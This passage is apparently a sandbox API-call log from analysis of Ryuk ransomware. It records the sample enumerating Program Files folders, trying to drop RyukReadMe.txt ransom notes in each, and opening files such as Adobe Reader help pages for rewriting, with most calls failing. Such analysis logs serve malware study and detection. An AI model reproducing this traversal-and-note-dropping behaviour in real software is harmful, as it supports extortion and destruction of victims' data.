(normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.227] GetLastError () returned 0x5 [0138.227] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0138.227] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.227] FindFirstFileW (in: lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e20 [0138.229] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.229] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.229] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.229] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.229] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.229] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.229] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.229] SetLastError (dwErrCode=0x0) [0138.229] CreateFileW (lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RyukReadMe.txt" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.229] GetLastError () returned 0x5 [0138.229] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.229] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.230] FindFirstFileW (in: lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2e80 [0138.230] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.230] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.230] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.230] SetFileAttributesW (lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml", dwFileAttributes=0x80) returned 0 [0138.231] CreateFileW (lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\redistlist\\frameworklist.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.231] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.231] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.231] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0138.231] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0138.231] SetLastError (dwErrCode=0x0) [0138.231] CreateFileW (lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\RyukReadMe.txt" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\redistlist\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.231] GetLastError () returned 0x5 [0138.231] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.231] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.231] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.231] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.231] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.231] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.231] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.231] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.231] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.231] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.231] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.231] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.232] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.232] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.232] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.232] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.232] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.232] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.232] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.232] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.232] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.232] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.232] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.232] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.232] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.232] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.232] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.232] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.232] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0138.232] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0138.232] SetLastError (dwErrCode=0x0) [0138.232] CreateFileW (lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RyukReadMe.txt" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.232] GetLastError () returned 0x5 [0138.232] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0138.232] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.232] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0138.232] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0138.232] SetLastError (dwErrCode=0x0) [0138.232] CreateFileW (lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\RyukReadMe.txt" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.232] GetLastError () returned 0x5 [0138.232] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0138.232] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.232] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0138.233] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0138.233] SetLastError (dwErrCode=0x0) [0138.233] CreateFileW (lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\program files\\reference assemblies\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.233] GetLastError () returned 0x5 [0138.233] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0138.233] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.233] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0138.233] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0138.233] SetLastError (dwErrCode=0x0) [0138.233] CreateFileW (lpFileName="C:\\Program Files\\Reference Assemblies\\RyukReadMe.txt" (normalized: "c:\\program files\\reference assemblies\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.233] GetLastError () returned 0x5 [0138.233] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0138.233] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.233] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0138.233] SetLastError (dwErrCode=0x0) [0138.233] CreateFileW (lpFileName="C:\\Program Files\\RyukReadMe.txt" (normalized: "c:\\program files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.233] GetLastError () returned 0x5 [0138.233] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0138.233] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.233] FindFirstFileW (in: lpFileName="C:\\Program Files\\Uninstall Information\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2d00 [0138.233] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0138.234] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0138.234] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0138.234] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0138.234] SetLastError (dwErrCode=0x0) [0138.234] CreateFileW (lpFileName="C:\\Program Files\\Uninstall Information\\RyukReadMe.txt" (normalized: "c:\\program files\\uninstall information\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.234] GetLastError () returned 0x5 [0138.234] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0138.234] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.234] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0138.234] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0138.234] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0138.234] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0138.234] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0138.234] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0138.234] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0138.234] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0138.234] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 0 [0138.234] FindClose (in: hFindFile=0x3c7120 | out: hFindFile=0x3c7120) returned 1 [0138.234] SetLastError (dwErrCode=0x0) [0138.234] CreateFileW (lpFileName="C:\\Program Files\\RyukReadMe.txt" (normalized: "c:\\program files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.234] GetLastError () returned 0x5 [0138.234] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0138.234] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.234] FindNextFileW (in: hFindFile=0x3bcd90, lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 1 [0138.234] SetLastError (dwErrCode=0x0) [0138.234] CreateFileW (lpFileName="C:\\RyukReadMe.txt" (normalized: "c:\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.234] GetLastError () returned 0x5 [0138.234] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0138.235] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.235] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\*.*", lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 0x3a2d00 [0138.235] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0138.235] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0138.235] SetLastError (dwErrCode=0x0) [0138.235] CreateFileW (lpFileName="C:\\Program Files (x86)\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.235] GetLastError () returned 0x5 [0138.235] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0138.235] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.235] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2d60 [0138.235] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0138.235] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0138.235] SetLastError (dwErrCode=0x0) [0138.235] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.235] GetLastError () returned 0x5 [0138.235] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0138.235] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.235] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0138.235] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.236] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.236] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.236] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", dwFileAttributes=0x80) returned 0 [0138.237] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\benioku.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.237] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.237] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.238] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.238] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.238] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm", dwFileAttributes=0x80) returned 0 [0138.238] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\berime.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.238] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.239] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.239] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.239] SetLastError (dwErrCode=0x0) [0138.239] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.239] GetLastError () returned 0x5 [0138.239] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0138.239] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.239] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0138.239] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.239] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.239] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0138.239] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0138.239] SetLastError (dwErrCode=0x0) [0138.239] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\esl\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.239] GetLastError () returned 0x5 [0138.239] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0138.239] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.240] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.240] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.240] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm", dwFileAttributes=0x80) returned 0 [0138.240] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\irakhau.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.240] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.240] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.241] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.241] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.241] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm", dwFileAttributes=0x80) returned 0 [0138.241] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leame.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.241] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.242] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.242] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.242] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.242] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm", dwFileAttributes=0x80) returned 0 [0138.242] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leesmij.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.243] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.243] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.243] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.243] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.243] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm", dwFileAttributes=0x80) returned 0 [0138.243] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leggimi.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.243] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.243] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.243] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.243] 